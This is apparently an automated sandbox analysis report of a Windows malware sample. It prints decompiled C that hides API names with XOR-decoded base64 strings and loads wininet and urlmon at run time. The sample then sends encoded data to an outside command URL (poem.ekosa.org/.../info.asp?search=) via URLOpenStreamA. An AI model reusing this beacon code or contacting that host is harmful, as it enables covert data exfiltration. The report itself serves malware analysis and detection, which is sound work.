        control_flow_graph 115 1231eb0-1231eec call 12333d0 LoadLibraryA 118 1231ef2-1231f11 call 12316a0 115->118 119 123222f-123223e call 1232550 115->119 124 1231f14-1231f19 118->124 124->124 125 1231f1b-1231f3f call 1231260 124->125 128 1231f41-1231f44 125->128 129 1231f9d-1231fb4 GetProcAddress 125->129 132 1231f87-1231f89 128->132 133 1231f46-1231f4d 128->133 130 1231fba-1231fc5 LoadLibraryA 129->130 131 123222e 129->131 130->131 135 1231fcb-1231fed call 12316a0 130->135 131->119 132->129 134 1231f8b 132->134 136 1231f54-1231f5f 133->136 137 1231f4f-1231f53 133->137 139 1231f90-1231f9b 134->139 142 1231ff0-1231ff5 135->142 138 1231f65-1231f85 136->138 137->136 138->132 138->138 139->129 139->139 142->142 143 1231ff7-123201a call 1231260 142->143 146 123207d-123208e GetProcAddress 143->146 147 123201c-123201f 143->147 146->131 148 1232094-123209f LoadLibraryA 146->148 149 1232021-1232028 147->149 150 1232068-123206a 147->150 148->131 152 12320a5-12320c4 call 12316a0 148->152 153 123202a-123202e 149->153 154 123202f-123203a 149->154 150->146 151 123206c 150->151 156 1232070-123207b 151->156 160 12320c7-12320cc 152->160 153->154 155 1232040-1232060 154->155 155->155 158 1232062 155->158 156->146 156->156 158->150 160->160 161 12320ce-12320f1 call 1231260 160->161 164 12320f3-12320f6 161->164 165 123215d-123216e GetProcAddress 161->165 166 1232148-123214a 164->166 167 12320f8-12320ff 164->167 165->131 168 1232174-1232193 call 12316a0 165->168 166->165 171 123214c 166->171 169 1232101-1232105 167->169 170 1232106-1232117 167->170 177 1232196-123219b 168->177 169->170 173 1232120-1232140 170->173 174 1232150-123215b 171->174 173->173 176 1232142 173->176 174->165 174->174 176->166 177->177 178 123219d-12321c0 call 1231260 177->178 181 12321c2-12321c5 178->181 182 123221f-1232229 GetProcAddress 178->182 183 12321c7-12321ce 181->183 184 123220e-1232210 181->184 182->131 185 12321d0-12321d4 183->185 186 12321d5-12321e0 183->186 184->182 187 1232212-123221d 184->187 185->186 188 12321e6-1232206 186->188 187->182 187->187 188->188 189 1232208 188->189 189->184
        C-Code - Quality: 24%
        			E01231EB0() {
				signed int _v8;
				char _v252;
				char _v268;
				signed int _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				intOrPtr _t68;
				_Unknown_base(*)()* _t71;
				struct HINSTANCE__* _t72;
				intOrPtr _t75;
				_Unknown_base(*)()* _t78;
				struct HINSTANCE__* _t79;
				intOrPtr _t82;
				char _t85;
				intOrPtr _t88;
				signed int _t93;
				char* _t94;
				signed int _t98;
				char* _t99;
				signed int _t103;
				char* _t104;
				signed int _t108;
				char* _t109;
				intOrPtr _t112;
				intOrPtr* _t115;
				void* _t118;
				intOrPtr* _t119;
				void* _t122;
				intOrPtr* _t123;
				void* _t126;
				intOrPtr* _t127;
				void* _t130;
				signed int _t131;
				void* _t132;
				void* _t134;
				void* _t136;
				void* _t138;
				void* _t140;
				struct HINSTANCE__* _t141;
				void* _t142;
				void* _t145;
				void* _t148;
				void* _t151;
				void* _t154;
				signed int _t155;

				_t60 =  *0x1249004; // 0x5a4607f2
				_v8 = _t60 ^ _t155;
				E012333D0(_t140,  &_v268, 0, 0x104);
				_t112 =  *0x1242024;
				_t141 = LoadLibraryA("Kernel32.dll");
				if(_t141 != 0) {
					_push("3ez7/+r7zuzx/fvt7d8=");
					_push(0x104);
					_push( &_v268);
					E012316A0();
					_t115 =  &_v268;
					_t132 = _t115 + 1;
					do {
						_t68 =  *_t115;
						_t115 = _t115 + 1;
					} while (_t68 != 0);
					_v272 = _t115 - _t132;
					_push(_t142);
					E01231260( &_v268,  &_v272, _t141);
					_t131 = _v272;
					_t118 = 0;
					if(_t131 > 0) {
						if(_t131 >= 0x20) {
							_t108 = _t131 & 0x8000001f;
							if(_t108 < 0) {
								_t108 = (_t108 - 0x00000001 | 0xffffffe0) + 1;
							}
							asm("movaps xmm1, [0x12477a0]");
							_t154 = _t131 - _t108;
							_t109 =  &_v252;
							do {
								asm("movups xmm0, [eax-0x10]");
								_t118 = _t118 + 0x20;
								_t109 = _t109 + 0x20;
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x30], xmm0");
								asm("movups xmm0, [eax-0x20]");
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x20], xmm0");
							} while (_t118 < _t154);
						}
						while(_t118 < _t131) {
							 *(_t155 + _t118 - 0x108) =  *(_t155 + _t118 - 0x108) ^ 0x0000009e;
							_t118 = _t118 + 1;
						}
					}
					_t71 = GetProcAddress(_t141,  &_v268);
					 *0x124a2c4 = _t71;
					if(_t71 != 0) {
						_t72 = LoadLibraryA("wininet.dll"); // executed
						_t141 = _t72;
						if(_t141 != 0) {
							_push("2vvy++r7y+zy3f/99vvb8Ors598=");
							_push(0x104);
							_push( &_v268);
							E012316A0();
							_t119 =  &_v268;
							_t134 = _t119 + 1;
							do {
								_t75 =  *_t119;
								_t119 = _t119 + 1;
							} while (_t75 != 0);
							_v272 = _t119 - _t134;
							E01231260( &_v268,  &_v272, _t141);
							_t131 = _v272;
							_t122 = 0;
							if(_t131 > 0) {
								if(_t131 >= 0x20) {
									_t103 = _t131 & 0x8000001f;
									if(_t103 < 0) {
										_t103 = (_t103 - 0x00000001 | 0xffffffe0) + 1;
									}
									asm("movaps xmm1, [0x12477a0]");
									_t151 = _t131 - _t103;
									_t104 =  &_v252;
									do {
										asm("movups xmm0, [eax-0x10]");
										_t122 = _t122 + 0x20;
										_t104 = _t104 + 0x20;
										asm("pxor xmm0, xmm1");
										asm("movups [eax-0x30], xmm0");
										asm("movups xmm0, [eax-0x20]");
										asm("pxor xmm0, xmm1");
										asm("movups [eax-0x20], xmm0");
									} while (_t122 < _t151);
								}
								while(_t122 < _t131) {
									 *(_t155 + _t122 - 0x108) =  *(_t155 + _t122 - 0x108) ^ 0x0000009e;
									_t122 = _t122 + 1;
								}
							}
							_t78 = GetProcAddress(_t141,  &_v268);
							 *0x124a2c0 = _t78;
							if(_t78 != 0) {
								_t79 = LoadLibraryA("urlmon.dll"); // executed
								_t141 = _t79;
								if(_t141 != 0) {
									_push("y8zS2vHp8PLx//rK8dj38vvf");
									_push(0x104);
									_push( &_v268);
									E012316A0();
									_t123 =  &_v268;
									_t136 = _t123 + 1;
									do {
										_t82 =  *_t123;
										_t123 = _t123 + 1;
									} while (_t82 != 0);
									_v272 = _t123 - _t136;
									E01231260( &_v268,  &_v272, _t141);
									_t131 = _v272;
									_t126 = 0;
									if(_t131 > 0) {
										if(_t131 >= 0x20) {
											_t98 = _t131 & 0x8000001f;
											if(_t98 < 0) {
												_t98 = (_t98 - 0x00000001 | 0xffffffe0) + 1;
											}
											asm("movaps xmm1, [0x12477a0]");
											_t148 = _t131 - _t98;
											_t99 =  &_v252;
											asm("o16 nop [eax+eax]");
											do {
												asm("movups xmm0, [eax-0x10]");
												_t126 = _t126 + 0x20;
												_t99 = _t99 + 0x20;
												asm("pxor xmm0, xmm1");
												asm("movups [eax-0x30], xmm0");
												asm("movups xmm0, [eax-0x20]");
												asm("pxor xmm0, xmm1");
												asm("movups [eax-0x20], xmm0");
											} while (_t126 < _t148);
										}
										while(_t126 < _t131) {
											 *(_t155 + _t126 - 0x108) =  *(_t155 + _t126 - 0x108) ^ 0x0000009e;
											_t126 = _t126 + 1;
										}
									}
									_t85 = GetProcAddress(_t141,  &_v268);
									"`\\lmC:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat" = _t85;
									if(_t85 != 0) {
										_push("y8zS0e778M3q7Pv/898=");
										_push(0x104);
										_push( &_v268);
										E012316A0();
										_t127 =  &_v268;
										_t138 = _t127 + 1;
										do {
											_t88 =  *_t127;
											_t127 = _t127 + 1;
										} while (_t88 != 0);
										_v272 = _t127 - _t138;
										E01231260( &_v268,  &_v272, _t141);
										_t131 = _v272;
										_t130 = 0;
										if(_t131 > 0) {
											if(_t131 >= 0x20) {
												_t93 = _t131 & 0x8000001f;
												if(_t93 < 0) {
													_t93 = (_t93 - 0x00000001 | 0xffffffe0) + 1;
												}
												asm("movaps xmm1, [0x12477a0]");
												_t145 = _t131 - _t93;
												_t94 =  &_v252;
												do {
													asm("movups xmm0, [eax-0x10]");
													_t130 = _t130 + 0x20;
													_t94 = _t94 + 0x20;
													asm("pxor xmm0, xmm1");
													asm("movups [eax-0x30], xmm0");
													asm("movups xmm0, [eax-0x20]");
													asm("pxor xmm0, xmm1");
													asm("movups [eax-0x20], xmm0");
												} while (_t130 < _t145);
											}
											while(_t130 < _t131) {
												 *(_t155 + _t130 - 0x108) =  *(_t155 + _t130 - 0x108) ^ 0x0000009e;
												_t130 = _t130 + 1;
											}
										}
										 *0x124a2bc = GetProcAddress(_t141,  &_v268);
									}
								}
							}
						}
					}
					_pop(_t142);
				}
				return E01232550(_t112, _v8 ^ _t155, _t131, _t141, _t142);
			}



















































        0x01231eb9
        0x01231ec0
        0x01231ed3
        0x01231ed8
        0x01231ee8
        0x01231eec
        0x01231ef2
        0x01231efd
        0x01231f02
        0x01231f03
        0x01231f08
        0x01231f11
        0x01231f14
        0x01231f14
        0x01231f16
        0x01231f17
        0x01231f23
        0x01231f2f
        0x01231f30
        0x01231f35
        0x01231f3b
        0x01231f3f
        0x01231f44
        0x01231f48
        0x01231f4d
        0x01231f53
        0x01231f53
        0x01231f54
        0x01231f5d
        0x01231f5f
        0x01231f65
        0x01231f65
        0x01231f69
        0x01231f6c
        0x01231f6f
        0x01231f73
        0x01231f77
        0x01231f7b
        0x01231f7f
        0x01231f83
        0x01231f65
        0x01231f89
        0x01231f90
        0x01231f98
        0x01231f99
        0x01231f89
        0x01231fab
        0x01231fad
        0x01231fb4
        0x01231fbf
        0x01231fc1
        0x01231fc5
        0x01231fcb
        0x01231fd6
        0x01231fdb
        0x01231fdc
        0x01231fe1
        0x01231fea
        0x01231ff0
        0x01231ff0
        0x01231ff2
        0x01231ff3
        0x01231fff
        0x0123200b
        0x01232010
        0x01232016
        0x0123201a
        0x0123201f
        0x01232023
        0x01232028
        0x0123202e
        0x0123202e
        0x0123202f
        0x01232038
        0x0123203a
        0x01232040
        0x01232040
        0x01232044
        0x01232047
        0x0123204a
        0x0123204e
        0x01232052
        0x01232056
        0x0123205a
        0x0123205e
        0x01232062
        0x0123206a
        0x01232070
        0x01232078
        0x01232079
        0x0123206a
        0x01232085
        0x01232087
        0x0123208e
        0x01232099
        0x0123209b
        0x0123209f
        0x012320a5
        0x012320b0
        0x012320b5
        0x012320b6
        0x012320bb
        0x012320c4
        0x012320c7
        0x012320c7
        0x012320c9
        0x012320ca
        0x012320d6
        0x012320e2
        0x012320e7
        0x012320ed
        0x012320f1
        0x012320f6
        0x012320fa
        0x012320ff
        0x01232105
        0x01232105
        0x01232106
        0x0123210f
        0x01232111
        0x01232117
        0x01232120
        0x01232120
        0x01232124
        0x01232127
        0x0123212a
        0x0123212e
        0x01232132
        0x01232136
        0x0123213a
        0x0123213e
        0x01232142
        0x0123214a
        0x01232150
        0x01232158
        0x01232159
        0x0123214a
        0x01232165
        0x01232167
        0x0123216e
        0x01232174
        0x0123217f
        0x01232184
        0x01232185
        0x0123218a
        0x01232193
        0x01232196
        0x01232196
        0x01232198
        0x01232199
        0x012321a5
        0x012321b1
        0x012321b6
        0x012321bc
        0x012321c0
        0x012321c5
        0x012321c9
        0x012321ce
        0x012321d4
        0x012321d4
        0x012321d5
        0x012321de
        0x012321e0
        0x012321e6
        0x012321e6
        0x012321ea
        0x012321ed
        0x012321f0
        0x012321f4
        0x012321f8
        0x012321fc
        0x01232200
        0x01232204
        0x01232208
        0x01232210
        0x01232212
        0x0123221a
        0x0123221b
        0x01232210
        0x01232229
        0x01232229
        0x0123216e
        0x0123209f
        0x0123208e
        0x01231fc5
        0x0123222e
        0x0123222e
        0x0123223e

        APIs
        • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 01231EE6
        • GetProcAddress.KERNEL32(00000000,?), ref: 01231FAB
        • LoadLibraryA.KERNELBASE(wininet.dll), ref: 01231FBF
        • GetProcAddress.KERNEL32(00000000,?), ref: 01232085
        • LoadLibraryA.KERNELBASE(urlmon.dll), ref: 01232099
        • GetProcAddress.KERNEL32(00000000,?), ref: 01232165
        • GetProcAddress.KERNEL32(00000000,?), ref: 01232227
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: AddressProc$LibraryLoad
        • String ID: 2vvy++r7y+zy3f/99vvb8Ors598=$3ez7/+r7zuzx/fvt7d8=$Kernel32.dll$urlmon.dll$wininet.dll$y8zS0e778M3q7Pv/898=$y8zS2vHp8PLx//rK8dj38vvf
        • API String ID: 2238633743-3804073418
        • Opcode ID: ac452062c111524441b9978be2d4e8f215f736e9bb0e625e8ff8cd3d4e498ba3
        • Instruction ID: 3e1f74108615050e1bedbe61d8d88fdff5635e6b8f9ffb50f650b5674d8e4fae
        • Opcode Fuzzy Hash: ac452062c111524441b9978be2d4e8f215f736e9bb0e625e8ff8cd3d4e498ba3
        • Instruction Fuzzy Hash: 8DA1357482061A8BCB29CB3CCD406F9B775BFBA304F2883D9C995A7152FB7096C58B50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01232D83, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 238 1232d83-1232d8e SetUnhandledExceptionFilter
        C-Code - Quality: 100%
        			E01232D83() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E01232D8F); // executed
				return _t1;
			}




        0x01232d88
        0x01232d8e

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002D8F,01232609), ref: 01232D88
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: dde3499b65a6f51e152b656025acfb60f98274ed4e73645a1c6d3c789cbe97fa
        • Instruction ID: cbf9bb46c52011c6b13a04115fdd254d955413c01a329f408cd96ea7369c7a2f
        • Opcode Fuzzy Hash: dde3499b65a6f51e152b656025acfb60f98274ed4e73645a1c6d3c789cbe97fa
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01231A90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127memorynetworkCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 190 1231a90-1231ae4 call 12333d0 LocalAlloc 193 1231aea-1231b07 call 12333d0 call 1240500 190->193 194 1231c08-1231c18 call 1232550 190->194 201 1231b50-1231b77 call 1231410 193->201 202 1231b09-1231b0c 193->202 209 1231b80-1231b88 201->209 203 1231b43-1231b45 202->203 204 1231b0e-1231b1e 202->204 203->201 207 1231b47-1231b4e 203->207 206 1231b21-1231b41 204->206 206->203 206->206 207->201 207->207 210 1231b9b-1231b9d 209->210 211 1231b8a-1231b8f 209->211 212 1231ba0-1231bbc call 1231620 210->212 213 1231b9f 210->213 211->210 214 1231b91-1231b97 211->214 218 1231bc0-1231bc5 212->218 213->212 214->209 216 1231b99 214->216 216->213 218->218 219 1231bc7-1231c02 call 1240500 DeleteUrlCacheEntry URLOpenStreamA LocalFree 218->219 219->194
        C-Code - Quality: 73%
        			E01231A90(signed int __ecx, signed int __edx) {
				signed int _v8;
				char _v2056;
				signed int _v2060;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				intOrPtr _t43;
				char _t52;
				void* _t55;
				void* _t61;
				char* _t63;
				intOrPtr* _t65;
				void* _t71;
				void* _t73;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;

				_t29 =  *0x1249004; // 0x5a4607f2
				_v8 = _t29 ^ _t78;
				_v2060 = __ecx;
				_t76 = __edx;
				E012333D0(_t74,  &_v2056, 0, 0x800);
				_t69 = 0xaaaaaaab * (8 + _t76 * 4) >> 0x20 >> 1;
				_t56 = (0xaaaaaaab * (8 + _t76 * 4) >> 0x20 >> 1) + 0x2a;
				_t75 = LocalAlloc(0x40, (0xaaaaaaab * (8 + _t76 * 4) >> 0x20 >> 1) + 0x2a);
				if(_t75 != 0) {
					E012333D0(_t75, _t75, 0, _t56);
					E01240500(_t75, _v2060, _t76);
					_t61 = 0;
					if(_t76 != 0) {
						if(_t76 >= 0x20) {
							asm("movaps xmm1, [0x12477a0]");
							_t73 = _t76 - (_t76 & 0x0000001f);
							_t12 = _t75 + 0x10; // 0x10
							_t55 = _t12;
							do {
								asm("movups xmm0, [eax-0x10]");
								_t61 = _t61 + 0x20;
								_t55 = _t55 + 0x20;
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x30], xmm0");
								asm("movups xmm0, [eax-0x20]");
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x20], xmm0");
							} while (_t61 < _t73);
						}
						while(_t61 < _t76) {
							 *(_t61 + _t75) =  *(_t61 + _t75) ^ 0x0000009e;
							_t61 = _t61 + 1;
						}
					}
					_v2060 = _t76;
					E01231410(_t75,  &_v2060, _t76);
					_t63 =  &_v2056;
					_t71 = 0x104;
					_t76 = "http://poem.ekosa.org/intro/info/info.asp" - _t63;
					asm("o16 nop [eax+eax]");
					while(1) {
						_t19 = _t71 + 0x7ffffefa; // 0x7ffffffe
						if(_t19 == 0) {
							break;
						}
						_t52 =  *((intOrPtr*)(_t76 + _t63));
						if(_t52 == 0) {
							break;
						} else {
							 *_t63 = _t52;
							_t63 = _t63 + 1;
							_t71 = _t71 - 1;
							if(_t71 != 0) {
								continue;
							} else {
								L13:
								_t63 = _t63 - 1;
							}
						}
						L14:
						 *_t63 = 0;
						E01231620( &_v2056, "?search=");
						_t65 =  &_v2056;
						_t69 = _t65 + 1;
						do {
							_t43 =  *_t65;
							_t65 = _t65 + 1;
						} while (_t43 != 0);
						E01240500( &(( &_v2056)[_t65 - _t69]), _t75, _v2060);
						DeleteUrlCacheEntry( &_v2056);
						 *0x124a2bc(0,  &_v2056, 0, 0); // executed
						LocalFree(_t75);
						goto L17;
					}
					if(_t71 == 0) {
						goto L13;
					}
					goto L14;
				}
				L17:
				return E01232550(_t56, _v8 ^ _t78, _t69, _t75, _t76);
			}























        0x01231a99
        0x01231aa0
        0x01231ab1
        0x01231aba
        0x01231abc
        0x01231ad2
        0x01231ad4
        0x01231ae0
        0x01231ae4
        0x01231aee
        0x01231afb
        0x01231b03
        0x01231b07
        0x01231b0c
        0x01231b0e
        0x01231b1c
        0x01231b1e
        0x01231b1e
        0x01231b21
        0x01231b21
        0x01231b25
        0x01231b28
        0x01231b2b
        0x01231b2f
        0x01231b33
        0x01231b37
        0x01231b3b
        0x01231b3f
        0x01231b21
        0x01231b45
        0x01231b47
        0x01231b4b
        0x01231b4c
        0x01231b45
        0x01231b56
        0x01231b5e
        0x01231b63
        0x01231b70
        0x01231b75
        0x01231b77
        0x01231b80
        0x01231b80
        0x01231b88
        0x00000000
        0x00000000
        0x01231b8a
        0x01231b8f
        0x00000000
        0x01231b91
        0x01231b91
        0x01231b93
        0x01231b94
        0x01231b97
        0x00000000
        0x01231b99
        0x01231b9f
        0x01231b9f
        0x01231b9f
        0x01231b97
        0x01231ba0
        0x01231ba0
        0x01231bae
        0x01231bb3
        0x01231bb9
        0x01231bc0
        0x01231bc0
        0x01231bc2
        0x01231bc3
        0x01231bd9
        0x01231be8
        0x01231bfb
        0x01231c02
        0x00000000
        0x01231c02
        0x01231b9d
        0x00000000
        0x00000000
        0x00000000
        0x01231b9d
        0x01231c08
        0x01231c18

        APIs
        • LocalAlloc.KERNEL32(00000040,?), ref: 01231ADA
        • DeleteUrlCacheEntry.WININET(?), ref: 01231BE8
        • URLOpenStreamA.URLMON(00000000,?,00000000,00000000), ref: 01231BFB
        • LocalFree.KERNEL32(00000000), ref: 01231C02
        Strings
        • http://poem.ekosa.org/intro/info/info.asp, xrefs: 01231B69
        • ?search=, xrefs: 01231BA9
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: Local$AllocCacheDeleteEntryFreeOpenStream
        • String ID: ?search=$http://poem.ekosa.org/intro/info/info.asp
        • API String ID: 1450232118-2916777287
        • Opcode ID: 4150ead6e119a573c7dec191f28e9e3acdf2787e8aec3b4db4f873498b8ab51e
        • Instruction ID: 6c5493f1e43fb67d9256fa2cc9b89fdd488065a855ea77393720933441fcb2a6
        • Opcode Fuzzy Hash: 4150ead6e119a573c7dec191f28e9e3acdf2787e8aec3b4db4f873498b8ab51e
        • Instruction Fuzzy Hash: DD418BB4A202158BDB29CB38DD45BFDBBB9FF95200F0881D8E68557141FF309989CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 012365F3, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 222 12365f3-12365fe 223 1236600-123660a 222->223 224 123660c-1236612 222->224 223->224 225 1236640-123664b call 1236fad 223->225 226 1236614-1236615 224->226 227 123662b-123663c RtlAllocateHeap 224->227 232 123664d-123664f 225->232 226->227 228 1236617-123661e call 1235eda 227->228 229 123663e 227->229 228->225 235 1236620-1236629 call 123a2c1 228->235 229->232 235->225 235->227
        C-Code - Quality: 95%
        			E012365F3(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x124a198, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01235EDA();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E01236FAD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0123A2C1(_t15, _t16, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}











        0x012365f3
        0x012365f9
        0x012365fe
        0x0123660c
        0x0123660c
        0x01236612
        0x01236614
        0x01236614
        0x0123662b
        0x01236634
        0x0123663c
        0x00000000
        0x00000000
        0x0123661c
        0x0123661e
        0x01236640
        0x01236645
        0x0123664b
        0x00000000
        0x0123664b
        0x01236621
        0x01236626
        0x01236627
        0x01236629
        0x00000000
        0x00000000
        0x01236629
        0x00000000
        0x0123662b
        0x01236604
        0x0123660a
        0x00000000
        0x00000000
        0x00000000

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 01236634
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: f940863337a8e686b7b616a439fcd6b37e184d8b1e5c7f874e5e2758732f46e3
        • Instruction ID: 213eb62f1d19d0aa6f33cd2244503d6b33dc0acd0ae5e095a6322dfdabfefaac
        • Opcode Fuzzy Hash: f940863337a8e686b7b616a439fcd6b37e184d8b1e5c7f874e5e2758732f46e3
        • Instruction Fuzzy Hash: D6F0B4B1634532BFEB226F2A9C05B6B3F5CAFD16F0B054021AA08D7584CA38D6019EE4
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 0123B40E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 64%
        			E0123B40E(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t771;
				intOrPtr _t773;
				intOrPtr _t774;
				void* _t775;
				signed int _t779;
				signed int _t780;
				signed int _t786;
				signed int _t792;
				intOrPtr _t794;
				void* _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t807;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t829;
				signed int _t830;
				signed int _t836;
				signed int _t837;
				signed int _t840;
				signed int _t845;
				signed int _t853;
				signed int* _t856;
				signed int _t860;
				signed int _t871;
				signed int _t872;
				signed int _t874;
				char* _t875;
				signed int _t878;
				signed int _t882;
				signed int _t883;
				signed int _t888;
				signed int _t890;
				signed int _t895;
				signed int _t904;
				signed int _t907;
				signed int _t909;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t917;
				signed int _t930;
				signed int _t931;
				signed int _t933;
				char* _t934;
				signed int _t937;
				signed int _t941;
				signed int _t942;
				signed int* _t944;
				signed int _t947;
				signed int _t949;
				signed int _t954;
				signed int _t962;
				signed int _t965;
				signed int _t969;
				signed int* _t976;
				intOrPtr _t978;
				void* _t979;
				intOrPtr* _t981;
				signed int* _t985;
				unsigned int _t996;
				signed int _t997;
				void* _t1000;
				signed int _t1001;
				void* _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1006;
				signed int _t1016;
				signed int _t1021;
				signed int _t1024;
				unsigned int _t1027;
				signed int _t1028;
				void* _t1031;
				signed int _t1032;
				void* _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1037;
				signed int _t1042;
				signed int* _t1047;
				signed int _t1049;
				signed int _t1059;
				void* _t1060;
				void _t1062;
				signed int _t1065;
				void* _t1068;
				void* _t1075;
				signed int _t1081;
				signed int _t1082;
				signed int _t1085;
				signed int _t1086;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1094;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				unsigned int _t1115;
				void* _t1118;
				intOrPtr _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int* _t1127;
				void* _t1131;
				void* _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1135;
				signed int _t1138;
				signed int _t1139;
				signed int _t1144;
				signed int _t1146;
				signed int _t1147;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
